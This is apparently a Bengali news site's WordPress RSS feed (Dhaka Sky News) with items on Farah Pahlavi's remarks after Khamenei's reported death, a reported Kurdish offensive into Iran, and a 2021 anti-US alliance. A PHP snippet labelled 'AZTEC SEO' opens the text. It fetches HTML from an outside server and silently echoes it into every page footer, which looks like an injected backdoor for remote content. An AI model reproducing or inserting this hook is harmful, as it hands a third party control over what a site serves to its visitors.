/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); আলোচিত উক্তি – Dhaka Sky News https://www.dhakaskynews.com Dhaka Sky News Thu, 05 Mar 2026 09:22:48 +0000 en-US hourly 1 https://wordpress.org/?v=6.9.9 খামেনির মৃত্যুতে ইরানি শাসনব্যবস্থা ‘আপনা–আপনি’ ভেঙে পড়বে না: ফারাহ পাহলভি https://www.dhakaskynews.com/%e0%a6%86%e0%a6%b2%e0%a7%8b%e0%a6%9a%e0%a6%bf%e0%a6%a4-%e0%a6%89%e0%a6%95%e0%a7%8d%e0%a6%a4%e0%a6%bf/2026/03/05/News_ID-5714/ https://www.dhakaskynews.com/%e0%a6%86%e0%a6%b2%e0%a7%8b%e0%a6%9a%e0%a6%bf%e0%a6%a4-%e0%a6%89%e0%a6%95%e0%a7%8d%e0%a6%a4%e0%a6%bf/2026/03/05/News_ID-5714/#respond Thu, 05 Mar 2026 09:22:48 +0000 https://www.dhakaskynews.com/?p=5714 ইরানের জনগণ যাতে নিজেদের ভবিষ্যৎ নিজেরা নির্ধারণ করতে পারে, সেই অধিকারকে সম্মান দেখাতে আন্তর্জাতিক সম্প্রদায়ের প্রতি আহ্বান জানিয়েছেন দেশটির শেষ শাহের স্ত্রী ফারাহ পাহলভি। ইরানের সর্বোচ্চ নেতা আয়াতুল্লাহ আলি খামেনিকে হত্যা ‘ঐতিহাসিকভাবে গুরুত্বপূর্ণ’ হলেও তা ইরানের বর্তমান শাসনব্যবস্থার ‘স্বয়ংক্রিয় পতন’ ডেকে আনবে না বলে মন্তব্য করেছেন তিনি।
টিআরটি ওয়ার্ল্ড জানিয়েছে, যুক্তরাষ্ট্র ও ইসরাইলের যৌথ হামলায় ইসলামি প্রজাতন্ত্র ইরানের সর্বোচ্চ নেতা খামেনি নিহত হওয়ার তিন দিন পর মঙ্গলবার এক সাক্ষাৎকারে তিনি এ কথা বলেন।
ফারাহ পাহলভি বলেন, কোনো একজন মানুষের মৃত্যু—তিনি ক্ষমতা কাঠামোর যতই কেন্দ্রে থাকুন না কেন—নিজে থেকে একটি ব্যবস্থার অবসান ঘটায় না।
৮৭ বছর বয়সি এই সাবেক সম্রাজ্ঞীর ভাষায়, আইনের শাসনের ভিত্তিতে পরিচালিত একটি রাষ্ট্রের শান্তিপূর্ণ, সুশৃঙ্খল ও সার্বভৌম রূপান্তরের লক্ষ্যে ইরানি জনগণ কতটা ঐক্যবদ্ধ হতে পারবে, সেটাই নির্ধারণ করে দেবে ভবিষ্যৎ।
১৯৭৯ সালে ইরানের ইসলামি বিপ্লবে ক্ষমতাচ্যুত হয়ে দেশ ছাড়তে বাধ্য হন ফারাহর স্বামী শাহ মোহাম্মদ রেজা পাহলভি। তখন থেকেই প্যারিসে নির্বাসিত জীবন কাটাচ্ছেন ফারাহ। ইরানের জনগণ যাতে নিজেদের ভবিষ্যৎ নিজেরা নির্ধারণ করতে পারে, সেই অধিকারকে সম্মান দেখাতে আন্তর্জাতিক সম্প্রদায়ের প্রতি আহ্বান জানাচ্ছেন তিনি।
ফারাহ পাহলভি বলেন, আমি চাই আন্তর্জাতিক সম্প্রদায় স্পষ্টভাবে ইরানিদের মৌলিক অধিকারকে সমর্থন দিক—তাদের নেতা বেছে নেওয়ার অধিকার, মুক্তভাবে মত প্রকাশের অধিকার, মর্যাদা ও সমৃদ্ধির সঙ্গে বেঁচে থাকার অধিকার। ওই সমর্থন হতে হবে জনগণের প্রতি, ভূরাজনৈতিক হিসাব-নিকাশের প্রতি নয়।
ইরানি কর্তৃপক্ষের প্রতি ফারাহ পাহলভির আহ্বান, তারা যেন ‘সংযম’ প্রদর্শন করে এবং রক্তপাত এড়িয়ে চলে।
জানুয়ারিতে তেহরানে বিক্ষোভ ছড়িয়ে পড়ার পর কঠোর দমন-পীড়ন চালানো হয়। যুক্তরাষ্ট্রভিত্তিক মানবাধিকার সংগঠন হিউম্যান রাইটস অ্যাক্টিভিস্টস নিউজ এজেন্সি জানিয়েছে, ওই দমন অভিযানে সাত হাজারের বেশি মানুষ নিহত হয়েছেন, যাদের বেশিরভাগই বিক্ষোভকারী। তবে প্রকৃত সংখ্যা আরও বেশি হতে পারে।
এদিকে ইরানের ইসলামি সরকারের পতন হলে নিজেকে বিকল্প নেতৃত্ব হিসেবে তুলে ধরছেন ফারাহ পাহলভির ছেলে রেজা পাহলভি। মঙ্গলবার এক এক্স পোস্টে তিনি ইরানের বিভিন্ন জাতিগত সংখ্যালঘু গোষ্ঠীর প্রতি জাতীয় ঐক্যের আহ্বান জানান। পাশাপাশি চলমান সংঘাতকে ‘সুযোগ’ হিসেবে ব্যবহার না করার ইঙ্গিত দেন। যুক্তরাষ্ট্রে বসবাসরত রেজা পাহলভি ১৯৭৯ সালের বিপ্লবের আগে থেকে আর ইরানে যাননি। সূত্র: যুগান্তর

]]>
https://www.dhakaskynews.com/%e0%a6%86%e0%a6%b2%e0%a7%8b%e0%a6%9a%e0%a6%bf%e0%a6%a4-%e0%a6%89%e0%a6%95%e0%a7%8d%e0%a6%a4%e0%a6%bf/2026/03/05/News_ID-5714/feed/ 0
ইরানে স্থল অভিযান শুরু, দাবি করল মার্কিন সংবাদ মাধ্যম https://www.dhakaskynews.com/%e0%a6%86%e0%a6%b2%e0%a7%8b%e0%a6%9a%e0%a6%bf%e0%a6%a4-%e0%a6%89%e0%a6%95%e0%a7%8d%e0%a6%a4%e0%a6%bf/2026/03/05/News_ID-5649/ https://www.dhakaskynews.com/%e0%a6%86%e0%a6%b2%e0%a7%8b%e0%a6%9a%e0%a6%bf%e0%a6%a4-%e0%a6%89%e0%a6%95%e0%a7%8d%e0%a6%a4%e0%a6%bf/2026/03/05/News_ID-5649/#respond Thu, 05 Mar 2026 08:07:54 +0000 https://www.dhakaskynews.com/?p=5649 ইরাকি সীমান্তের কাছাকাছি এলাকা থেকে হাজার হাজার কুর্দি যোদ্ধা ইরানের অভ্যন্তরে স্থল অভিযান শুরু করেছে। এর মধ্য দিয়ে আঞ্চলিক উত্তেজনা বাড়ার সঙ্গে সঙ্গে তেহরানের বিরুদ্ধে যুদ্ধের আরেকটি ফ্রন্ট তৈরি হয়েছে।
বুধবার (৪ মার্চ) মার্কিন গণমাধ্যম ফক্স নিউজের এক প্রতিবেদনে এ তথ্য নিশ্চিত করা হয়েছে। এ ছাড়া জেরুজালেম পোস্ট ইসরায়েলি কর্মকর্তাদের সূত্রে একই তথ্য জানিয়েছে।
ইরান-ইরাক সীমান্তে কার্যরত কুর্দি বাহিনীকে তেহরানের বিরুদ্ধে লড়াই করা সবচেয়ে গুরুত্বপূর্ণ সশস্ত্র বিরোধী গোষ্ঠীগুলোর মধ্যে একটি হিসেবে ধরা হয়। এই গোষ্ঠীগুলো ইরানি কুর্দি সম্প্রদায়ভিত্তিক। এদের হাজার হাজার যোদ্ধা রয়েছে। এদের অধিকাংশই ইরানের সীমান্তবর্তী ইরাকের কুর্দিস্তান অঞ্চল থেকে কার্যক্রম পরিচালনা করে।
কুর্দি সূত্রের মতে, এই বাহিনী সাম্প্রতিক দিনগুলোতে পশ্চিম ইরানে স্থল অভিযানে অংশগ্রহণের জন্য প্রস্তুতি নিচ্ছে। যার লক্ষ্য ইরানি নিরাপত্তা বাহিনীকে চাপ দেওয়া এবং বিভিন্ন ক্ষেত্রে তাদের ছত্রভঙ্গ করা। সূত্র: ফক্স নিউজ

]]>
https://www.dhakaskynews.com/%e0%a6%86%e0%a6%b2%e0%a7%8b%e0%a6%9a%e0%a6%bf%e0%a6%a4-%e0%a6%89%e0%a6%95%e0%a7%8d%e0%a6%a4%e0%a6%bf/2026/03/05/News_ID-5649/feed/ 0
মার্কিন-বিরোধী জোট গঠন করছে ১৬টি দেশ https://www.dhakaskynews.com/international/2021/03/12/News_ID-2204/ https://www.dhakaskynews.com/international/2021/03/12/News_ID-2204/#respond Fri, 12 Mar 2021 16:37:27 +0000 https://www.dhakaskynews.com/?p=2204 জাতিসংঘকে ব্যবহার করে আমেরিকা বিশ্বের বিভিন্ন দেশের বিরুদ্ধে যে হুমকি ও নিষেধাজ্ঞা দিয়ে আসছে তা মোকাবেলার জন্য ইসলামি প্রজাতন্ত্র ইরান, রাশিয়া এবং চীনসহ ১৬টি দেশ জোটবদ্ধ হচ্ছে।

এ জোটে আরো রয়েছে সিরিয়া, ফিলিস্তিন, উত্তর কোরিয়া, ভেনিজুয়েলা এবং কিউবা। এছাড়া প্রতিষ্ঠাতা সদস্য দেশ হিসেবে অন্য যেসব থাকবে তারা হলো- আলজেরিয়া, অ্যাঙ্গোলা, বেলারুশ, বলিভিয়া, ক্যাম্বোডিয়া, ইরিত্রিয়া, লাওস, নিকারাগুয়া সেইন্ট ভিনসেন্ট এবং গ্রেনাডিন্স দ্বীপপুঞ্জ।

এসব দেশের সমন্বয়ে সম্ভাব্য জোট গঠনের বিষয়ে বার্তা সংস্থা রয়টার্সের হাতে কিছু তথ্য পড়েছে যার বরাত দিয়ে সংস্থাটি জানিয়েছে, মার্কিন-বিরোধী এসব দেশ মনে করে বহু পাক্ষিকতাবাদের বিরুদ্ধে নজিরবিহীনভাবে আমেরিকা আক্রমণ চালিয়ে যাচ্ছে এবং দেশটি শাস্তিতমূলক পদক্ষেপ হিসেবে বিভিন্ন দেশের ওপর জোর করে নিষেধাজ্ঞা চাপাচ্ছে, কখনো কখনো আন্তর্জাতিক বিভিন্ন চুক্তি থেকে বেরিয়ে যাচ্ছে যা একাধিপত্যবাদের চূড়ান্ত লক্ষণ। আমেরিকার কারণে আন্তর্জাতিক শান্তি ও নিরাপত্তা মারাত্মকভাবে বিঘ্নিত হচ্ছে বলেও দেশগুলো মনে করে।

সম্ভ্যাব্য জোট গঠনকারী দেশগুলোর প্রায় সবাই মার্কিন নিষেধাজ্ঞার কবলে রয়েছে। এর মধ্যে শান্তিপূর্ণ পরমাণু কর্মসূচির পরও ইরানের ওপর নিষেধাজ্ঞা দিয়ে রেখেছে আমেরিকা। এছাড়া, প্রযুক্তিগত দ্বন্দ্বের কারণে চীনের বিরুদ্ধে এবং ক্রিমিয়াকে রাশিয়ার সঙ্গে একীভূত করার জন্য মস্কোর বিরুদ্ধে নিষেধাজ্ঞা আরোপ করে ওয়াশিংটন। সূত্র : পার্সটুডে

]]>
https://www.dhakaskynews.com/international/2021/03/12/News_ID-2204/feed/ 0
“জীবন হোক কর্মময়, নিরন্তর ছুটে চলা। চিরকাল বিশ্রাম নেয়ার জন্য তো কবর পড়েই আছে” – হযরত আলী (রা) https://www.dhakaskynews.com/%e0%a6%86%e0%a6%b2%e0%a7%8b%e0%a6%9a%e0%a6%bf%e0%a6%a4-%e0%a6%89%e0%a6%95%e0%a7%8d%e0%a6%a4%e0%a6%bf/2020/05/23/News_ID-266/ https://www.dhakaskynews.com/%e0%a6%86%e0%a6%b2%e0%a7%8b%e0%a6%9a%e0%a6%bf%e0%a6%a4-%e0%a6%89%e0%a6%95%e0%a7%8d%e0%a6%a4%e0%a6%bf/2020/05/23/News_ID-266/#respond Sat, 23 May 2020 17:52:46 +0000 https://www.dhakaskynews.com/?p=266 https://www.dhakaskynews.com/%e0%a6%86%e0%a6%b2%e0%a7%8b%e0%a6%9a%e0%a6%bf%e0%a6%a4-%e0%a6%89%e0%a6%95%e0%a7%8d%e0%a6%a4%e0%a6%bf/2020/05/23/News_ID-266/feed/ 0